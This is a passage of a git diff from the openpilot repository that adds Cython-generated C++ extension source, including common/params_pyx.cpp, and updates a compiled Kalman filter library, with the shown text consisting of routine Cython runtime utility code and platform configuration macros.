__Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (cls == a || cls == b) return 1; + mro = cls->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + PyObject *base = PyTuple_GET_ITEM(mro, i); + if (base == (PyObject *)a || base == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(cls, a) || __Pyx_InBases(cls, b); +} +#if PY_MAJOR_VERSION == 2 +static int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject* exc_type2) { + PyObject *exception, *value, *tb; + int res; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&exception, &value, &tb); + res = exc_type1 ? PyObject_IsSubclass(err, exc_type1) : 0; + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + if (!res) { + res = PyObject_IsSubclass(err, exc_type2); + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + } + __Pyx_ErrRestore(exception, value, tb); + return res; +} +#else +static CYTHON_INLINE int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject *exc_type2) { + if (exc_type1) { + return __Pyx_IsAnySubtype2((PyTypeObject*)err, (PyTypeObject*)exc_type1, (PyTypeObject*)exc_type2); + } else { + return __Pyx_IsSubtype((PyTypeObject*)err, (PyTypeObject*)exc_type2); + } +} +#endif +static int __Pyx_PyErr_GivenExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + assert(PyExceptionClass_Check(exc_type)); + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i '9'); + break; + } + if (rt_from_call[i] != ctversion[i]) { + same = 0; + break; + } + } + if (!same) { + char rtversion[5] = {'\0'}; + char message[200]; + for (i=0; i<4; ++i) { + if (rt_from_call[i] == '.') { + if (found_dot) break; + found_dot = 1; + } else if (rt_from_call[i] < '0' || rt_from_call[i] > '9') { + break; + } + rtversion[i] = rt_from_call[i]; + } + PyOS_snprintf(message, sizeof(message), + "compile time version %s of module '%.100s' " + "does not match runtime version %s", + ctversion, __Pyx_MODULE_NAME, rtversion); + return PyErr_WarnEx(NULL, message, 1); + } + return 0; +} + +/* InitStrings */ +#if PY_MAJOR_VERSION >= 3 +static int __Pyx_InitString(__Pyx_StringTabEntry t, PyObject **str) { + if (t.is_unicode | t.is_str) { + if (t.intern) { + *str = PyUnicode_InternFromString(t.s); + } else if (t.encoding) { + *str = PyUnicode_Decode(t.s, t.n - 1, t.encoding, NULL); + } else { + *str = PyUnicode_FromStringAndSize(t.s, t.n - 1); + } + } else { + *str = PyBytes_FromStringAndSize(t.s, t.n - 1); + } + if (!*str) + return -1; + if (PyObject_Hash(*str) == -1) + return -1; + return 0; +} +#endif +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t) { + while (t->p) { + #if PY_MAJOR_VERSION >= 3 + __Pyx_InitString(*t, t->p); + #else + if (t->is_unicode) { + *t->p = PyUnicode_DecodeUTF8(t->s, t->n - 1, NULL); + } else if (t->intern) { + *t->p = PyString_InternFromString(t->s); + } else { + *t->p = PyString_FromStringAndSize(t->s, t->n - 1); + } + if (!*t->p) + return -1; + if (PyObject_Hash(*t->p) == -1) + return -1; + #endif + ++t; + } + return 0; +} + +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char* c_str) { + return __Pyx_PyUnicode_FromStringAndSize(c_str, (Py_ssize_t)strlen(c_str)); +} +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject* o) { + Py_ssize_t ignore; + return __Pyx_PyObject_AsStringAndSize(o, &ignore); +} +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +#if !CYTHON_PEP393_ENABLED +static const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + char* defenc_c; + PyObject* defenc = _PyUnicode_AsDefaultEncodedString(o, NULL); + if (!defenc) return NULL; + defenc_c = PyBytes_AS_STRING(defenc); +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + { + char* end = defenc_c + PyBytes_GET_SIZE(defenc); + char* c; + for (c = defenc_c; c < end; c++) { + if ((unsigned char) (*c) >= 128) { + PyUnicode_AsASCIIString(o); + return NULL; + } + } + } +#endif + *length = PyBytes_GET_SIZE(defenc); + return defenc_c; +} +#else +static CYTHON_INLINE const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + if (unlikely(__Pyx_PyUnicode_READY(o) == -1)) return NULL; +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + if (likely(PyUnicode_IS_ASCII(o))) { + *length = PyUnicode_GET_LENGTH(o); + return PyUnicode_AsUTF8(o); + } else { + PyUnicode_AsASCIIString(o); + return NULL; + } +#else + return PyUnicode_AsUTF8AndSize(o, length); +#endif +} +#endif +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject* o, Py_ssize_t *length) { +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT + if ( +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + __Pyx_sys_getdefaultencoding_not_ascii && +#endif + PyUnicode_Check(o)) { + return __Pyx_PyUnicode_AsStringAndSize(o, length); + } else +#endif +#if (!CYTHON_COMPILING_IN_PYPY && !CYTHON_COMPILING_IN_LIMITED_API) || (defined(PyByteArray_AS_STRING) && defined(PyByteArray_GET_SIZE)) + if (PyByteArray_Check(o)) { + *length = PyByteArray_GET_SIZE(o); + return PyByteArray_AS_STRING(o); + } else +#endif + { + char* result; + int r = PyBytes_AsStringAndSize(o, &result, length); + if (unlikely(r < 0)) { + return NULL; + } else { + return result; + } + } +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject* x) { + int is_true = x == Py_True; + if (is_true | (x == Py_False) | (x == Py_None)) return is_true; + else return PyObject_IsTrue(x); +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject* x) { + int retval; + if (unlikely(!x)) return -1; + retval = __Pyx_PyObject_IsTrue(x); + Py_DECREF(x); + return retval; +} +static PyObject* __Pyx_PyNumber_IntOrLongWrongResultType(PyObject* result, const char* type_name) { + __Pyx_TypeName result_type_name = __Pyx_PyType_GetName(Py_TYPE(result)); +#if PY_MAJOR_VERSION >= 3 + if (PyLong_Check(result)) { + if (PyErr_WarnFormat(PyExc_DeprecationWarning, 1, + "__int__ returned non-int (type " __Pyx_FMT_TYPENAME "). " + "The ability to return an instance of a strict subclass of int is deprecated, " + "and may be removed in a future version of Python.", + result_type_name)) { + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; + } + __Pyx_DECREF_TypeName(result_type_name); + return result; + } +#endif + PyErr_Format(PyExc_TypeError, + "__%.4s__ returned non-%.4s (type " __Pyx_FMT_TYPENAME ")", + type_name, type_name, result_type_name); + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x) { +#if CYTHON_USE_TYPE_SLOTS + PyNumberMethods *m; +#endif + const char *name = NULL; + PyObject *res = NULL; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x) || PyLong_Check(x))) +#else + if (likely(PyLong_Check(x))) +#endif + return __Pyx_NewRef(x); +#if CYTHON_USE_TYPE_SLOTS + m = Py_TYPE(x)->tp_as_number; + #if PY_MAJOR_VERSION < 3 + if (m && m->nb_int) { + name = "int"; + res = m->nb_int(x); + } + else if (m && m->nb_long) { + name = "long"; + res = m->nb_long(x); + } + #else + if (likely(m && m->nb_int)) { + name = "int"; + res = m->nb_int(x); + } + #endif +#else + if (!PyBytes_CheckExact(x) && !PyUnicode_CheckExact(x)) { + res = PyNumber_Int(x); + } +#endif + if (likely(res)) { +#if PY_MAJOR_VERSION < 3 + if (unlikely(!PyInt_Check(res) && !PyLong_Check(res))) { +#else + if (unlikely(!PyLong_CheckExact(res))) { +#endif + return __Pyx_PyNumber_IntOrLongWrongResultType(res, name); + } + } + else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_TypeError, + "an integer is required"); + } + return res; +} +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject* b) { + Py_ssize_t ival; + PyObject *x; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_CheckExact(b))) { + if (sizeof(Py_ssize_t) >= sizeof(long)) + return PyInt_AS_LONG(b); + else + return PyInt_AsSsize_t(b); + } +#endif + if (likely(PyLong_CheckExact(b))) { + #if CYTHON_USE_PYLONG_INTERNALS + if (likely(__Pyx_PyLong_IsCompact(b))) { + return __Pyx_PyLong_CompactValue(b); + } else { + const digit* digits = __Pyx_PyLong_Digits(b); + const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(b); + switch (size) { + case 2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return (Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + } + } + #endif + return PyLong_AsSsize_t(b); + } + x = PyNumber_Index(b); + if (!x) return -1; + ival = PyInt_AsSsize_t(x); + Py_DECREF(x); + return ival; +} +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject* o) { + if (sizeof(Py_hash_t) == sizeof(Py_ssize_t)) { + return (Py_hash_t) __Pyx_PyIndex_AsSsize_t(o); +#if PY_MAJOR_VERSION < 3 + } else if (likely(PyInt_CheckExact(o))) { + return PyInt_AS_LONG(o); +#endif + } else { + Py_ssize_t ival; + PyObject *x; + x = PyNumber_Index(o); + if (!x) return -1; + ival = PyInt_AsLong(x); + Py_DECREF(x); + return ival; + } +} +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b) { + return b ? __Pyx_NewRef(Py_True) : __Pyx_NewRef(Py_False); +} +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t ival) { + return PyInt_FromSize_t(ival); +} + + +/* #### Code section: utility_code_pragmas_end ### */ +#ifdef _MSC_VER +#pragma warning( pop ) +#endif + + + +/* #### Code section: end ### */ +#endif /* Py_PYTHON_H */ diff --git a/common/kalman/simple_kalman_impl.so b/common/kalman/simple_kalman_impl.so index 3007dc61c..26196cf46 100755 Binary files a/common/kalman/simple_kalman_impl.so and b/common/kalman/simple_kalman_impl.so differ diff --git a/common/params_pyx.cpp b/common/params_pyx.cpp new file mode 100644 index 000000000..4ed627db2 --- /dev/null +++ b/common/params_pyx.cpp @@ -0,0 +1,17377 @@ +/* Generated by Cython 3.0.0 */ + +/* BEGIN: Cython Metadata +{ + "distutils": { + "depends": [ + "common/params.h" + ], + "language": "c++", + "name": "common.params_pyx", + "sources": [ + "/data/openpilot/common/params_pyx.pyx" + ] + }, + "module_name": "common.params_pyx" +} +END: Cython Metadata */ + +#ifndef PY_SSIZE_T_CLEAN +#define PY_SSIZE_T_CLEAN +#endif /* PY_SSIZE_T_CLEAN */ +#if defined(CYTHON_LIMITED_API) && 0 + #ifndef Py_LIMITED_API + #if CYTHON_LIMITED_API+0 > 0x03030000 + #define Py_LIMITED_API CYTHON_LIMITED_API + #else + #define Py_LIMITED_API 0x03030000 + #endif + #endif +#endif + +#include "Python.h" +#ifndef Py_PYTHON_H + #error Python headers needed to compile C extensions, please install development version of Python. +#elif PY_VERSION_HEX < 0x02070000 || (0x03000000 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x03030000) + #error Cython requires Python 2.7+ or Python 3.3+. +#else +#define CYTHON_ABI "3_0_0" +#define __PYX_ABI_MODULE_NAME "_cython_" CYTHON_ABI +#define __PYX_TYPE_MODULE_PREFIX __PYX_ABI_MODULE_NAME "." +#define CYTHON_HEX_VERSION 0x030000F0 +#define CYTHON_FUTURE_DIVISION 1 +#include +#ifndef offsetof + #define offsetof(type, member) ( (size_t) & ((type*)0) -> member ) +#endif +#if !defined(_WIN32) && !defined(WIN32) && !defined(MS_WINDOWS) + #ifndef __stdcall + #define __stdcall + #endif + #ifndef __cdecl + #define __cdecl + #endif + #ifndef __fastcall + #define __fastcall + #endif +#endif +#ifndef DL_IMPORT + #define DL_IMPORT(t) t +#endif +#ifndef DL_EXPORT + #define DL_EXPORT(t) t +#endif +#define __PYX_COMMA , +#ifndef HAVE_LONG_LONG + #define HAVE_LONG_LONG +#endif +#ifndef PY_LONG_LONG + #define PY_LONG_LONG LONG_LONG +#endif +#ifndef Py_HUGE_VAL + #define Py_HUGE_VAL HUGE_VAL +#endif +#if defined(GRAALVM_PYTHON) + /* For very preliminary testing purposes. Most variables are set the same as PyPy. + The existence of this section does not imply that anything works or is even tested */ + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 1 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PYPY_VERSION) + #define CYTHON_COMPILING_IN_PYPY 1 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #if PY_VERSION_HEX < 0x03090000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE (PY_VERSION_HEX >= 0x030400a1 && PYPY_VERSION_NUM >= 0x07030C00) + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(CYTHON_LIMITED_API) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 1 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_CLINE_IN_TRACEBACK + #define CYTHON_CLINE_IN_TRACEBACK 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 1 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #endif + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 1 + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PY_NOGIL) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 1 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #ifndef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 +#else + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 1 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #ifndef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #endif + #ifndef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 1 + #endif + #if PY_MAJOR_VERSION < 3 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #ifndef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 1 + #endif + #ifndef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 1 + #endif + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #if PY_VERSION_HEX < 0x030300F0 || PY_VERSION_HEX >= 0x030B00A2 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #elif !defined(CYTHON_USE_UNICODE_WRITER) + #define CYTHON_USE_UNICODE_WRITER 1 + #endif + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #ifndef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 1 + #endif + #ifndef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL (PY_MAJOR_VERSION < 3 || PY_VERSION_HEX >= 0x03060000 && PY_VERSION_HEX < 0x030C00A6) + #endif + #ifndef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL (PY_VERSION_HEX >= 0x030700A1) + #endif + #ifndef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 1 + #endif + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #endif + #if PY_VERSION_HEX < 0x030400a1 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #elif !defined(CYTHON_USE_TP_FINALIZE) + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #if PY_VERSION_HEX < 0x030600B1 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #elif !defined(CYTHON_USE_DICT_VERSIONS) + #define CYTHON_USE_DICT_VERSIONS (PY_VERSION_HEX < 0x030C00A5) + #endif + #if PY_VERSION_HEX < 0x030700A3 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #elif !defined(CYTHON_USE_EXC_INFO_STACK) + #define CYTHON_USE_EXC_INFO_STACK 1 + #endif + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 1 + #endif +#endif +#if !defined(CYTHON_FAST_PYCCALL) +#define CYTHON_FAST_PYCCALL (CYTHON_FAST_PYCALL && PY_VERSION_HEX >= 0x030600B1) +#endif +#if !defined(CYTHON_VECTORCALL) +#define CYTHON_VECTORCALL (CYTHON_FAST_PYCCALL && PY_VERSION_HEX >= 0x030800B1) +#endif +#define CYTHON_BACKPORT_VECTORCALL (CYTHON_METH_FASTCALL && PY_VERSION_HEX < 0x030800B1) +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_MAJOR_VERSION < 3 + #include "longintrepr.h" + #endif + #undef SHIFT + #undef BASE + #undef MASK + #ifdef SIZEOF_VOID_P + enum { __pyx_check_sizeof_voidp = 1 / (int)(SIZEOF_VOID_P == sizeof(void*)) }; + #endif +#endif +#ifndef __has_attribute + #define __has_attribute(x) 0 +#endif +#ifndef __has_cpp_attribute + #define __has_cpp_attribute(x) 0 +#endif +#ifndef CYTHON_RESTRICT + #if defined(__GNUC__) + #define CYTHON_RESTRICT __restrict__ + #elif defined(_MSC_VER) && _MSC_VER >= 1400 + #define CYTHON_RESTRICT __restrict + #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define CYTHON_RESTRICT restrict + #else + #define CYTHON_RESTRICT + #endif +#endif +#ifndef CYTHON_UNUSED + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(maybe_unused) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(maybe_unused) + #define CYTHON_UNUSED [[maybe_unused]] + #endif + #endif + #endif +#endif +#ifndef CYTHON_UNUSED +# if 